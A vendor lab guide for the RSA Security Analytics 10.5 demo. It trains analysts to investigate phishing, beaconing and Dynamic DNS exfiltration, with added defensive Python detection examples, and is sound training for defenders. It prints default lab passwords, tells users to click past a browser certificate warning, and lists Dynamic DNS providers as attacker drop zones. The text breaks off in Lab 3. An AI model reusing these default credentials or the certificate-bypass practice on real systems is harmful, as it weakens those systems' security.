
RSA SECURITY ANALYTICS 10.5 DEMO V11.

RSA, The Security Division of EMC - For Approved RSA Use Only

RSA Security Analytics 10.5 - Demo v11.1

Table of Contents
Introduction ..... 3
  Business Challenge ..... 4
  Solution ..... 5
Key Components ..... 6
  Security Analytics v10.5 ..... 7
Lab Overview ..... 8
  Lab Environment ..... 9
  Lab Credentials ..... 10
  Lab Scenario ..... 11
  Labs ..... 12
RSA Security Analytics 10.5 Labs ..... 13
  Lab 1 - Security Analytics Overview - Phishing Use Case ..... 14
  Lab 2 - Intelligence and Business Context - How to know what to look for ..... 42
  Lab 3 - Dynamic DNS and Data Exfiltration ..... 67
  Lab 4 - WebShell Attacks - How to Detect and Respond ..... 90
  Lab 5 - Malicious Insider - How to Detect and Respond ..... 116
Troubleshooting ..... 143
  General Troubleshooting and Tips ..... 144
  RSA Security Analytics Troubleshooting & Tips ..... 145
Conclusion ..... 147
  Conclusion ..... 148


Introduction


Business Challenge
Today's security threats are multi-faceted, dynamic and stealthy. Staying in front of attackers has never
been more difficult. Attackers spend significant resources learning about an organization in order
to develop malware that specifically targets that organization. Relying on signature-based tools has
become ineffective against these threats because the malware has never been seen before.
Organizations need tools that help them quickly detect compromises, the use of non-standard
communication tools, and the exfiltration or sabotage of critical data, and that manage the workflow from
detection to remediation. These tools enable them to confirm infections and take action.


Solution
Security Analytics will address the requirement for tools to enable quick detection of compromises, use
of non-standard communication tools, and exfiltration or sabotage of critical data.
With RSA Security Analytics, organizations can:
- Augment existing SIEM capabilities with better visibility, analysis and workflow
- Inspect every packet session for threat indicators at time of collection, with capture-time enrichment
- Instantly pivot from incidents into network packet detail to perform network forensics and understand the true nature and scope of issues


Key Components


Security Analytics v10.5


As organizations' IT security departments have evolved over the years to combat malicious or
unauthorized access to their information assets, they have relied on an information security model
based on multiple layers of defense. Technologies such as firewalls, intrusion prevention, antivirus,
zero-day protection mechanisms, data loss prevention, and strong authentication have been introduced.
The goal of this model is to add enough friction in the environment to eliminate, or at least drastically
slow down, an intrusion attempt.

The good news is that organizations are blocking more attacks than ever before, because all of these
layers are effective at preventing and blocking known attack vectors. The bad news is that despite this
investment, reported breaches have continued to increase year over year. These successful attacks
bypass each layer of prevention that has been put in place because they often use valid user
credentials, trusted access paths, or new exploits, and so go unnoticed by preventative controls.

As a result, organizations want more visibility into the effectiveness of these layers. More than ten
years ago, the security information and event management system (SIEM) was added to the IT
security repertoire. The purpose of a SIEM is to collect log data from the different security tools within an
organization and perform event correlation against that data. The SIEM gives security personnel
visibility of what is going on across the entire enterprise by connecting the dots between anomalies
within the different layers of defense. Organizations have no choice but to allow some traffic to pass
through all layers of defense in order to do business, so traffic will always flow through the preventative
controls. Logs tell only part of the story of what traffic makes it through: they report only on what the
preventative controls have identified. Organizations need a way to look at the traffic that the
preventative controls miss.

As organizations have added more preventative controls, the volume of data and events generated
has started to overwhelm the security team. The security team needs a way to get more work done in
less time. It also needs a way to make highly skilled security personnel more efficient and less skilled
security personnel more effective.


Lab Overview


Lab Environment
The environment for this lab includes the following:
1 Windows 2012 Launch Pad
1 Windows 2012 Domain Controller
1 Security Analytics Hybrid Server
1 Security Analytics Event Stream Analyzer


Lab Credentials
LaunchPad
vlab\Administrator / Password123!
All other machines are available through mRemoteNG, which is on the LaunchPad desktop.
Credentials for Windows machines (Domain Controller) are: Administrator / Password123!
Credentials for appliances (saesarchvr, sahybrid) are: root / netwitness
Security Analytics UI
admin / Password123! - Administrator
alex / Password123! - Limited Access
amy / Password123! - Data Privacy Officer
sam / Password123! - Level One Analyst
chris / Password123! - Level Two Analyst


Lab Scenario
Chris is a level two security analyst. He monitors the incident queue for alerts that may indicate
compromise of systems. He wants to improve the visibility into the systems as well as the efficiency of
the analysts. His manager, Jim, wants to standardize the workflow as well as gain visibility into it.


Labs
This lab includes the following labs:
Security Analytics Overview
Security Analytics Intelligence and Business Context - How to know what to look for
Dynamic DNS and Data Exfiltration
WebShell Attacks - How to Detect and Respond


RSA Security Analytics 10.5 Labs


Lab 1 - Security Analytics Overview - Phishing Use Case


This lab provides an overview of Security Analytics functionality.

Step 1 Connect to the Launchpad machine


Upon login, the launchpad will connect with the appropriate credentials.

Step 2 Data Capture


To ingest data, first double-click on the mRemoteNG icon on the desktop.

2.1 Open the Console


Open the sahybrid console by double-clicking on sahybrid in the list of connections.


2.2 Open the command file on the desktop


Right-click on the Data Generation icon on the desktop and choose Open.

2.3 Copy the command from the Desktop file


Highlight the command line under ASOC Demo and choose Copy or press Ctrl+C.


2.4 Paste the command in the Console


Paste the command into the console and press enter. The command will begin to run.

2.5 Wait for the command to complete.


It may take 8 to 10 minutes to complete.

Step 3 Connect to the Security Analytics User Interface


Click on the Firefox or Chrome icon on the taskbar. It will automatically connect to
https://sa.vlab.local/login as the home page. If it does not, choose the RSA Security Analytics
bookmark from the toolbar.


3.1 Warning screen for Chrome


If Chrome is chosen, the Your connection is not private warning may be displayed.
Click Advanced.


3.2 Bypassing the warning screen for Chrome


Click Proceed to sa.vlab.local (unsafe)


3.3 Enter the user credentials


Username = admin
Password = Password123!


Step 4 Dashboard
An analyst may start the work day by logging in and viewing the dashboard. An analyst may have more
than one dashboard defined.
1. Click Default Dashboard
2. Click Demo


4.1 Demo Dashboard


** Note: Due to the restrictions of the demonstration environment, it may take up to 5 minutes after data
capture is complete for the charts to be populated.
Note the Recent Alerts in the upper-left hand corner of the dashboard.
One of them looks like a malware callback and another one looks like a phishing attempt.
For this use case, start with the phishing attempt.


4.2 Click On Phishing Attempt


1. Click on the phishing_attempt column
2. Click Investigate

Step 5 Investigation Window


The investigation window is also available from the dashboard or from an alert received via
email, SMS, or any other mechanism that provides a link.
The investigation window provides the mechanism to drill down into information received
through alerts and dashboards.
It is also possible to start in the investigation window and perform hunting operations to identify
malicious activity, or even to troubleshoot network configuration problems.
This exercise started with an alert for a detected phishing attempt. When that specific alert is
clicked, the investigation window is displayed showing only the data that is relevant to that
alert.


When talking about a full packet capture technology such as RSA Security Analytics, there may
be hundreds and hundreds of terabytes of data in a system. Querying that amount of data can
be very cumbersome, but because of the use of meta data that RSA Security Analytics employs,
it is very quick.

Step 6 Breadcrumb
The section at the top is the query for the sessions that has been run against the RSA Security
Analytics meta data. This is called the breadcrumb. The breadcrumb shows the current subset
of data that the analyst is working with.


In this case you are looking at the data that is relevant to that phishing attempt alert that was
clicked.
It is possible to query on the alert itself as shown below.


Step 7 Meta Data Descriptors


Some more information about the meta data:
1. Any text in black represents the meta data category
2. The blue text is a value for that category
3. The green text is the session count for that value within that category
4. Looking at this phishing attempt, it is clear that it was against several different systems with
different levels of Criticality
5. It was alerted as phishing because the Risk:Warning category indicates that there was a link
that was not going to the website that was displayed.
6. A single IP address was the source
7. It was sent to seven distinct IP addresses


Step 8 Removing the Drill from the Investigation Window


Before drilling a little deeper into this phishing attempt, look at what the investigation window looks like if
the drill-down query for the phishing attempt is removed. All data for the system is shown.
1. Click the drop arrow on the breadcrumb and then choose Remove
Clicking on one of the links is just like clicking the alert from the incident or a dashboard. It drills
down to that specific spot within the investigation window and removes all of the other data so that the
view only shows data relevant to the phishing attempt.
2. To drill into the identified phishing alerts, click on the green number next to the phishing_attempt
alert to see only the sessions that caused the phishing attempt alerts to fire.

Step 9 Manage Column Groups View


If Activity Timeline is displayed, continue with Step 10. Otherwise, the layout of Events must be
changed.

9.1 Manage Column Groups View


1. To change the layout of Events, choose Detail View


2. Choose Custom Column Groups


3. Choose Activity Timeline

Step 10 Examining Events


1. The Event Type shows that this particular alert was fired based on network packet data
2. The Facility shows where the alert occurred
3. The Asset Criticality shows the business criticality of the asset, to help analysts prioritize
incidents.
4. Double-click on the first event to see more detail about the raw data.

Step 11 Raw Data


Up until this point, the investigation has only used meta data. Double-clicking on a session is when RSA
Security Analytics will look into the raw data and reconstruct the session for a human readable view.


Double-clicking recreates the session that triggered the alert. In this case, it shows the phishing attempt
was in the form of an email.
It looks like an email from Facebook, the gist of which is that changes were made to the account and the user
should log in and update his or her account.
1. Click on the www.facebook.com link in the email.

Step 12 Click link to see redirection


RSA Security Analytics displays a warning that the link was not going to Facebook. It was actually
going to the displayed IP address instead. This is the reason for the phishing attempt alert.
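The check behind this warning, as an added example that is not part of the lab guide or the RSA product: the code parses an HTML mail body, flags anchors whose visible text names one host while the href points to another, and also flags hrefs on a lookalike of a known brand domain (the .cm variant of a .com brand, as in Lab 2). The sample mail, the IP address and the brand list are constructed assumptions.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: an HTML mail body resembling the Facebook-themed lure
# from Lab 1. The IP and the lookalike domain are placeholders, not from the lab.
SAMPLE_EMAIL_HTML = """
<html><body>
<p>Changes were made to your account. Please log in to review them:</p>
<a href="http://203.0.113.45/login.php">www.facebook.com</a>
<p>Or visit <a href="https://www.facebook.com/help">our help center</a>.</p>
<p>See who viewed your profile: <a href="http://linkedin.cm/whoviewed">LinkedIn</a></p>
</body></html>
"""

# Brand domains the organisation expects such links to land on (assumption).
KNOWN_BRANDS = {"facebook.com", "linkedin.com"}

# Matches display text that is itself a hostname or URL, e.g. "www.facebook.com".
HOST_RE = re.compile(r"^(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})(?:[/:].*)?$", re.I)


class _AnchorCollector(HTMLParser):
    """Collects (href, visible text) pairs for every <a> in the body."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable(host):
    """Reduce a host to 'name.tld' (last two labels; simplification, no public suffix list).
    An IP literal is returned unchanged."""
    host = host.lower().rstrip(".")
    try:
        ipaddress.ip_address(host)
        return host
    except ValueError:
        pass
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def looks_like_brand(host):
    """Return the brand domain a host imitates by changing only the TLD, else None."""
    name, _, tld = registrable(host).rpartition(".")
    for brand in KNOWN_BRANDS:
        brand_name, _, brand_tld = brand.rpartition(".")
        if name == brand_name and tld != brand_tld:
            return brand
    return None


def analyze_links(html):
    """Return one finding per suspicious anchor, in document order."""
    collector = _AnchorCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.anchors:
        href_host = (urlparse(href).hostname or "").lower()
        match = HOST_RE.match(text)
        shown_host = match.group(1).lower() if match else None
        # Case 1: the text shows a hostname that is not where the href goes.
        if shown_host and registrable(shown_host) != registrable(href_host):
            findings.append({"href": href, "text": text, "reason": "display/href mismatch"})
            continue
        # Case 2: the href host is a near-miss of a brand we know.
        brand = looks_like_brand(href_host)
        if brand:
            findings.append({"href": href, "text": text, "reason": f"lookalike of {brand}"})
    return findings


if __name__ == "__main__":
    for finding in analyze_links(SAMPLE_EMAIL_HTML):
        print(finding)
```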


The next thing the analyst needs to do is find out who clicked on it. There were several emails that went
out to people in the organization. It is important to understand who actually clicked the link to identify the
damage that has occurred.

Step 13 Copy the IP Address


Copying the IP address of the destination will allow the analyst to drill in and query against the data to
see all of the data where the destination address equals the IP address that was in the email.
1. Copy the IP address by highlighting and pressing Ctrl+C
2. Click OK
3. Click the X to close the Link Address dialog box
4. Click the X to close the Event Reconstruction dialog box


Step 14 Navigate and Query


1. Click Navigate
2. Click Query
3. Paste the IP address in the value box
4. Choose Destination IP address (ip.dst) from the Select Meta drop-down
5. Choose = from the operator drop-down


14.1 Apply
1. Click Apply


Step 15 Query Results


1. It is easy to see that out of the people that received the e-mail, a few of them actually clicked it.
2. When they clicked, they were taken to this destination address
3. A suspicious executable was downloaded.

Step 16 More about the Query Results


Scroll down to the Destination Country category to see that the destination country is Belarus.
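The drill-and-query workflow of Steps 13 to 16, run over a handful of constructed session records as an added example (not the lab guide's or the product's code): a breadcrumb is a list of clauses, meta_view builds the black category / blue value / green count layout, and who_clicked intersects the phishing recipients with the hosts that later contacted the link's IP. All IP addresses and session records are constructed placeholders.

```python
from collections import Counter, defaultdict

# Constructed session metadata (placeholders, not from the lab environment):
# three phishing mails, HTTP sessions from two recipients to the link's host,
# and one unrelated HTTP session.
SESSIONS = [
    {"id": 1, "service": "SMTP", "ip.src": "198.51.100.7", "ip.dst": "10.0.0.11",
     "alert": "phishing_attempt", "asset.criticality": "High"},
    {"id": 2, "service": "SMTP", "ip.src": "198.51.100.7", "ip.dst": "10.0.0.12",
     "alert": "phishing_attempt", "asset.criticality": "Low"},
    {"id": 3, "service": "SMTP", "ip.src": "198.51.100.7", "ip.dst": "10.0.0.13",
     "alert": "phishing_attempt", "asset.criticality": "Medium"},
    {"id": 4, "service": "HTTP", "ip.src": "10.0.0.11", "ip.dst": "203.0.113.45",
     "country.dst": "Belarus", "filename": "sair.exe"},
    {"id": 5, "service": "HTTP", "ip.src": "10.0.0.13", "ip.dst": "203.0.113.45",
     "country.dst": "Belarus", "filename": "sair.exe"},
    {"id": 6, "service": "HTTP", "ip.src": "10.0.0.12", "ip.dst": "93.184.216.34",
     "country.dst": "United States", "filename": "index.html"},
]


def navigate(sessions, breadcrumb):
    """Return the sessions matching every (key, op, value) clause in the breadcrumb.
    Supported ops: '=', '!=' and 'exists' (value ignored). An empty breadcrumb
    is the 'Remove' case of Step 8: all data is shown."""
    def matches(session, key, op, value):
        if op == "exists":
            return key in session
        if key not in session:
            return False
        if op == "=":
            return session[key] == value
        if op == "!=":
            return session[key] != value
        raise ValueError(f"unsupported operator: {op}")
    return [s for s in sessions if all(matches(s, *clause) for clause in breadcrumb)]


def meta_view(sessions):
    """Category -> value -> session count, i.e. the black/blue/green layout of Step 7."""
    view = defaultdict(Counter)
    for session in sessions:
        for key, value in session.items():
            if key != "id":
                view[key][value] += 1
    return view


def who_clicked(sessions, alert_name, landing_ip):
    """Recipients of the alerted mail that subsequently connected to the link's host."""
    recipients = {s["ip.dst"] for s in navigate(sessions, [("alert", "=", alert_name)])}
    visitors = {s["ip.src"] for s in navigate(sessions, [("ip.dst", "=", landing_ip)])}
    return sorted(recipients & visitors)


if __name__ == "__main__":
    crumb = [("alert", "=", "phishing_attempt")]
    print("sessions behind the alert:", len(navigate(SESSIONS, crumb)))
    crumb = [("ip.dst", "=", "203.0.113.45")]  # the IP copied from the reconstructed mail
    for key, counts in meta_view(navigate(SESSIONS, crumb)).items():
        print(key, dict(counts))
    print("clicked:", who_clicked(SESSIONS, "phishing_attempt", "203.0.113.45"))
```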


Step 17 Looking at the file


1. Scroll down to the Filename category.
2. Right-click on the filename sair.exe (in blue) and choose Scan for Malware.
Because there are full packets still in the system, it is possible to right-click on the executable and tell
the system to scan it for malware.

Step 18 Scan for Malware


There are four different scans that can be performed on the executable file. Two of them are local to the
RSA Security Analytics system and two of them are remote. One of the local scans looks at how the file
is constructed to see if there are any anomalies in the way it was built. The other looks at how the
file came into your network to see if there is anything suspicious about the method by which it arrived.
Of the two remote scans, one sends the file to a cloud-based sandbox to watch its behavior and report
on it. The other sends it to VirusTotal, where it is compared against the signatures of many anti-virus
vendors.
1. Choose Malware Analysis from the drop-down list
2. Click Scan
The combination of those four scans gives a very good idea of whether this file is malicious.


With the knowledge gained from that 2-minute investigation, the analyst can send the
details to the email filtering provider to identify how the mail filtering solution missed this
email, and the IT department can remove the malware that was launched on the 3 infected
machines. This visibility allows the hole in the existing security layers to be closed and the damage
cleaned up before the incident can spread too far.

Step 19 Add the Events to an Incident


We can add these events to an incident for further study.
1. Click on the green number next to the Destination IP Address


19.1 Select Events


1. Select all events
2. Click Incidents->Create New Incident


19.2 Update Information


Alert Summary, Severity and Priority are already filled out based on the events. They may be modified.
Fill out the additional information for the incident such as:
1. Incident Name - unique name for this incident
2. Summary - summarize the events that occurred
3. Assignee
4. Categories - categorize this incident by choosing one or more categories from the drop-down
list
5. Click Save
Without RSA Security Analytics, a company would need to collect logs from mail servers and analyze
network traffic to identify the root cause. In addition, the malware may have been active longer on the
target systems leaving the company exposed to potential outsiders for an extended period of time.


Step 20 Optional - Daily Update Report


1. Click on the drop down menu and choose Reports.

20.1 View the Report Schedules


1. Click the Manage tab
2. Click Reports
3. Click View All Schedules


20.2 Run the Report


1. Click the Actions menu
2. Click Start
3. When the state is Completed, click View


20.3 Investigating from the Report


1. Click on the phishing_attempt column to display the Investigate link
2. Click on Investigate. The investigation window is displayed just as it was from the Incident or
Dashboard. If the message "The following meta keys have no values..." is displayed, see the
Troubleshooting tips.
3. Note that the report logo may be changed as desired
Close all browser tabs when finished.


Lab 2 - Intelligence and Business Context - How to know what to look for

In addition to full visibility, every RSA Security Analytics deployment comes with real-world threat
intelligence. RSA Live is the threat intelligence feed that is layered on top of the full visibility that RSA
Security Analytics provides. This intelligence allows the system to pick out small anomalies, or
indicators of compromise, within otherwise legitimate-looking data. The more indicators of compromise
a session has, the more likely it is malicious.
In addition to many commercially available threat intelligence feeds, RSA provides feeds from the First
Watch and Incident Response teams. When a company has a security breach, an incident response
team is dispatched. This team installs RSA Security Analytics along with a few other tools on the
network and eradicates the breach.
The lessons learned during that engagement are fed back to the RSA Live team and turned into threat
intelligence feeds. These feeds provide RSA Security Analytics deployments with valuable information
about the methods used by currently active threat actors. Organizations will get the benefit of learning
about the latest attacker techniques and applying that knowledge to their data. Incident response data is
just one example of how that threat intelligence is created. There are also third-party intelligence feeds
which can be ingested by the RSA Security Analytics platform.
Business context is yet another data point that can be fed into RSA Security Analytics. The ability to
label assets with meta data unique to an organization's business is critical for proper incident
prioritization. An alert that shows an attack against a random IP address is good information, but the
ability to identify that IP address as a credit card processing server in real time, as the traffic comes into
the system, is that much better. When an analyst can quickly identify an attack against a critical asset,
he can minimize the damage to that asset.
The combination of full visibility, fresh threat intelligence, and business context allows the security
analyst to quickly answer the questions that matter:
- Who is affected?
- How did they get infected?
- What is the impact to my business?
In this use case, security intelligence and business context allowed the identification of command and
control traffic from an executive laptop. Without RSA Security Analytics, this could be one of hundreds
of alerts that the layers of controls identify. With RSA Security Analytics, the type of alert is known, as
well as the criticality of the asset that appears to be compromised.


When this happens, it is critical to understand:


Is it a false positive?
How did it occur?
What is the impact to the business?
What is the appropriate response?

Step 1 Connect to the Launchpad machine


Upon login, the launchpad will connect with the appropriate credentials.

Step 2 Data Capture


If data was ingested during Lab 1 - Security Analytics Overview - Phishing Use Case, go to step 3.
To ingest fresh data, first double-click on the mRemoteNG icon on the desktop.


2.1 Open the Console


Open the sahybrid console by double-clicking on sahybrid in the list of connections.

2.2 Open the command file on the desktop


Right-click on the Data Generation icon on the desktop and choose Open.


2.3 Copy the command from the Desktop file


Highlight the command line under ASOC Demo and choose Copy or press Ctrl+C.

2.4 Paste the command in the Console


Paste the command into the console and press enter. The command will begin to run.


2.5 Wait for the command to complete.


It may take 8 to 10 minutes to complete.

Step 3 Connect to the Security Analytics User Interface


Click on the Firefox or Chrome icon on the taskbar. It will automatically connect to
https://sa.vlab.local/login as the home page. If it does not, choose the RSA Security Analytics
bookmark from the toolbar.


3.1 Warning screen for Chrome


If Chrome is chosen, the Your connection is not private warning may be displayed.
Click Advanced.


3.2 Bypassing the warning screen for Chrome


Click Proceed to sa.vlab.local (unsafe)


3.3 Enter the user credentials


Username = admin
Password = Password123!


Step 4 Incident Management


1. Click Dashboard
2. Choose Incidents
3. Choose Queue


Step 5 My Incidents
RSA Security Analytics offers organizations a unified platform for incident detection, investigations,
compliance reporting, and advanced security analysis. This allows the organization's highly skilled
security personnel to be more efficient and less skilled security personnel to be more effective.
Instead of starting at the dashboard, an analyst may start his or her day by going to the incident
management queue. This is a built-in incident management capability within Security Analytics. The
idea is that this has been operationalized so that when alerts of a certain priority come in, they
create an incident of a certain priority, so that the analyst knows what to work on first.
We can see incidents that have been created manually, as well as those generated automatically, that
have been assigned to the user's queue.


Step 6 Filter the Critical Incidents


The incidents can be sorted and filtered. To address the critical assets first, the analyst might click the
Critical check box to filter out all others.
1. Click Critical under Priority
2. Click Assigned under Status to see only those that have been assigned

6.1 Choose the Assigned Incident


1. Double-click the incident named Malware Callback Followed by Data Exfiltration with the
status of Assigned.


Step 7 Understanding the Incident


1. Clicking on the incident shows an overall Summary of this particular incident
2. Priority helps the analyst to understand the context of this incident.
3. Categorization, Status and other information also help to understand the context of this incident.
4. The Alerts pane shows the alerts that caused the creation of this incident. In this case, they are
alerts from the Event Stream Analysis component. The incident is a container, or a superset, of one
or more alerts.
5. Other important features are the Incident Journal and Remediation Tasks panes. Journaling is
important so that the team can understand what has been done, can make a determination on
what needs to be done next, and can see what remediation tasks may be needed.
6. Click on the gear next to the alert to see what has been happening on this host. There are three
choices: Investigate the Event, Investigate Source IP address (which in this case is the
potential victim), or Investigate Destination IP address.
7. Click on Investigate Source IP Address to investigate everything around this alert and this IP
address


Step 8 Investigate the Source IP Address


Note that, just like the drill-in from the dashboard in the first use case, this goes to the Investigation
view, where a filtered view of only the data applicable to that IP address is shown.
1. The breadcrumb shows this filter. By refocusing the investigation on just the IP address that is
infected, it is possible to dig in and look at the different sessions associated with this
particular source IP address.
2. By drilling into these sessions, it is possible to get a full picture of everything that occurred
before and after the infection. Click on the green number next to Source IP Address.

Step 9 Manage Column Groups View


If Activity Timeline is displayed, continue with Step 10. Otherwise, the layout of Events must be
changed.


9.1 Manage Column Groups View


1. To change the layout of Events, choose Detail View
2. Choose Custom Column Groups
3. Choose Activity Timeline


Step 10 Understanding the Infection


1. Note that there is a combination of log and packet data. Everything on this page is associated
with just the one IP address that was identified calling back out to a command-and-control
server. This is across both log and packet data.
2. This is out of the San Francisco facility, and the criticality is High because it is one of the
executive PCs.
3. The events are listed in chronological order from top to bottom. It can be read like a book. The
analyst can go through in the order of what this IP address did.
4. Here is where the actual alert was fired. This is where the malware protection system sent an
alert that said there was a call back.
How did the system get infected to begin with? The best way to find out is to start reading that book.


Step 11 From the beginning...


1. A user named mburns came in and logged in in the morning.
2. He checked his Instagram account and also used the Bing map service.
3. He went to LinkedIn, but LinkedIn looks strange because there are three different connections to
LinkedIn, and this particular one looks like it's associated with a suspicious file.
4. The suspicious file name is LinkedInWhosViewedMePDF.exe.
5. It has also been tagged by the NetWitness threat source.

Step 12 How the infection took place


The analyst wants to understand a little more about the traffic surrounding the download of this file.


12.1 Open the previous event


Double-click on the event prior to the one containing the filename.

12.2 Change to Text View


Changing the view to text view will allow the analyst to see the HTTP back-and-forth communication.
From this, the analyst will be able to understand that the executive did click on a link that downloaded
an EXE file.
1. Click on Best Reconstruction
2. Click View Text


12.3 Why did the executive click on the suspicious link?


Why would an executive do that? Surely he knew better than to click on a suspicious link.
But if the analyst looks a little deeper, he can see that the executive didn't actually click on a link to
LinkedIn.com; he clicked on one to LinkedIn.cm.
1. The analyst has gained a little understanding. It looks like the executive tried to go to LinkedIn,
misspelled the URL, and probably landed on a page on a domain parked by a bad actor. That bad
actor probably had a perfect replica of the website, and when the executive clicked on the
"Who's viewed me" link, the malware was downloaded. This is where the main infection happened.
2. Close the window by clicking the X in the upper right-hand corner.


12.4 Verifying with Events


This information shows where the infection took place. Closing this and looking a little further, we
can see that sure enough, that is exactly what happened. Before the file was downloaded:
1. He went to LinkedIn.cm
2. He clicked the link for Who's Viewed Me
3. He was then redirected to the actual LinkedIn.com.
He probably never knew he was infected and never knew what hit him. That answers the question
"How did the infection take place?"; the next question is "What is the business impact?"


Step 13 What is the business impact?


To answer that question, the analyst needs to go forward in time from the alert. He knows where the
infection took place and where the callback took place. What happened after the original callback?
1. There are a few HTTP sessions here that are about a minute apart. This is an indicator of
beaconing activity.
2. There is also a suspicious-looking FTP session that's been flagged as a malicious host by our
threat intelligence. Double-click on this session.
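The roughly one-minute spacing noted in item 1 is exactly what a beaconing rule keys on. The following is an added Python example, not part of the RSA lab or of the product, that groups outbound sessions by source/destination pair and flags pairs whose inter-arrival gaps are nearly constant. The IP addresses and timestamps are constructed sample data; min_sessions and max_jitter_ratio are assumed thresholds that a practitioner would tune per environment.

```python
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample events (src, dst, timestamp), not taken from the lab capture:
# one host contacting the same external address about once a minute, and one host
# whose sessions to another address are irregular, like ordinary browsing.
SAMPLE_EVENTS = [
    ("10.10.20.15", "203.0.113.40", "2015-09-01 09:41:02"),
    ("10.10.20.15", "203.0.113.40", "2015-09-01 09:42:05"),
    ("10.10.20.15", "203.0.113.40", "2015-09-01 09:43:01"),
    ("10.10.20.15", "203.0.113.40", "2015-09-01 09:44:04"),
    ("10.10.20.15", "203.0.113.40", "2015-09-01 09:45:00"),
    ("10.10.20.22", "198.51.100.7", "2015-09-01 09:40:10"),
    ("10.10.20.22", "198.51.100.7", "2015-09-01 09:40:13"),
    ("10.10.20.22", "198.51.100.7", "2015-09-01 09:52:40"),
    ("10.10.20.22", "198.51.100.7", "2015-09-01 10:15:03"),
    ("10.10.20.22", "198.51.100.7", "2015-09-01 10:15:05"),
]


def find_beacons(events, min_sessions=4, max_jitter_ratio=0.15):
    """Return {(src, dst): stats} for pairs whose session gaps are regular.

    Regularity is measured as the coefficient of variation of the gaps
    (population stddev / mean); a value at or below max_jitter_ratio means the
    sessions arrive on a near-fixed schedule. Both thresholds are assumptions.
    """
    by_pair = {}
    for src, dst, ts in events:
        stamp = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        by_pair.setdefault((src, dst), []).append(stamp)

    results = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_sessions:
            continue  # too few sessions to judge periodicity
        stamps.sort()
        gaps = [(later - earlier).total_seconds()
                for earlier, later in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # duplicate timestamps only; nothing to measure
        cv = pstdev(gaps) / avg
        if cv <= max_jitter_ratio:
            results[pair] = {
                "sessions": len(stamps),
                "mean_gap_s": round(avg, 1),
                "cv": round(cv, 3),
            }
    return results


if __name__ == "__main__":
    for pair, stats in find_beacons(SAMPLE_EVENTS).items():
        print(f"possible beacon {pair[0]} -> {pair[1]}: {stats}")
```

The infected-host pair has gaps of 63, 56, 63 and 56 seconds (mean 59.5 s, coefficient of variation about 0.06) and is reported; the browsing host's gaps range from 2 s to over 20 minutes and are not. In practice the rule should run over a window of at least several beacon periods, and a small jitter budget is needed because many implants randomize their sleep slightly.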


13.1 Examine the FTP event


The reconstructed FTP session shows the back-and-forth information that traveled between the infected
system and the external FTP server.
1. The username and password that were used are shown.
2. Many files were put to the FTP server. It looks like many PDF documents and Excel
spreadsheets.
3. Since the full packets are available, it is possible to extract the files and examine them to
determine the impact to the business. Click on Extract Files.
From a single user interface, and in only a minute or two, the analyst was able to determine who was
infected, how they became infected, and what damage was done to the business. With this information,
the organizations can close the holes in their security layers and alert the business on the details of
what information was exfiltrated.


13.2 File name for extraction


1. Choose a File Name
2. Click OK


13.3 File Extraction


1. Choose the file types to extract
2. Click Export and choose the export file type


13.4 Scheduled Job


1. Click OK
2. Click X on the Event Reconstruction page to close the window

Step 14 Summary
From a single user interface, and in only a minute or two, the analyst was able to determine who was
infected, how they became infected, and what damage was done to the business. With this information,
the organizations can close the holes in their security layers and alert the business on the details of
what information was exfiltrated.


Lab 3 - Dynamic DNS and Data Exfiltration


What is Data Exfiltration?
One of the most common goals of malicious actors is to steal data. Data exfiltration refers to the
successful sending of information out of an environment to an environment controlled by an attacker.
Data exfiltration takes many different forms and is an objective of many different types of specific
attacks.

What is Dynamic DNS?


Dynamic DNS is fundamentally a method of automatically updating name servers in public DNS
(Domain Name System) in near real time. It is used to keep a specific domain name linked to a
changing IP address when a static IP address is not available or not desired. Dynamic DNS domains
are typically hosted by providers for that specific purpose, where the provider owns the top-level domain
(TLD) and a subscriber can quickly (and usually freely) register sub-domains and point them to any IP
address they choose. Examples of common dynamic DNS domains/providers include:
no-ip.com
dyndns.org
changeip.com
duiadns.net
dynamicdns.org
...and many others
When a subscriber registers a subdomain, they are free to pick any name they want and map it to any
IP address they want. For example, one could register myuniquedomainname.no-ip.org or
asnl2349qpwdan.no-ip.org and have both resolve to 5.6.7.8.


A Typical Attack Scenario


For nefarious purposes, dynamic DNS allows an attacker to change the actual host and IP address
used as a drop zone, for malvertising, or as a command and control point without having to modify the
behavior of the malware used on the victim's endpoint. This provides a quick and convenient
mechanism for attackers to evade detection by traditional IP/domain reputation services. While
dynamic DNS can be used for many stages of an attack, this scenario focuses on its use as a drop
zone for data exfiltration, uncovered by noticing an anomaly in a daily report.


Detection and Response


Detection of traffic or logs containing access to and from dynamic DNS domains can be done by
traditional tools such as IDS/IPS, firewalls, and SIEM; however, depending on the nature of the attack,
none of those tools can provide full visibility into the associated network traffic, particularly in the case of
data exfiltration.

Step 1 Connect to the Launchpad machine


Upon login, the launchpad will connect with the appropriate credentials.

Step 2 Data Capture


To capture fresh data, first double-click on the mRemoteNG icon on the desktop.


2.1 Open the Console


Open the sahybrid console by double-clicking on sahybrid in the list of connections.

2.2 Open the command file on the desktop


Right-click on the Data Generation icon on the desktop and choose Open.


2.3 Copy the command from the Desktop file


Highlight the command line under Dyn DNS Demo and choose Copy or Ctrl+C

2.4 Paste the command in the Console


1. Paste the command into the console and press enter.
2. The command will begin to run.
3. Wait for it to complete


Step 3 Connect to the Security Analytics User Interface


Click on the Firefox or Chrome icon on the taskbar. It will automatically connect to
https://sa.vlab.local/login as the home page. If it does not, choose the RSA Security Analytics
bookmark from the toolbar.

3.1 Warning screen for Chrome


If Chrome is chosen, the "Your connection is not private" warning may be displayed.
Click Advanced.


3.2 Bypassing the warning screen for Chrome


Click Proceed to sa.vlab.local (unsafe)


3.3 Enter the user credentials


Username = admin
Password = Password123!


Step 4 Reports
Key solution: RSA Security Analytics for Packets and Logs
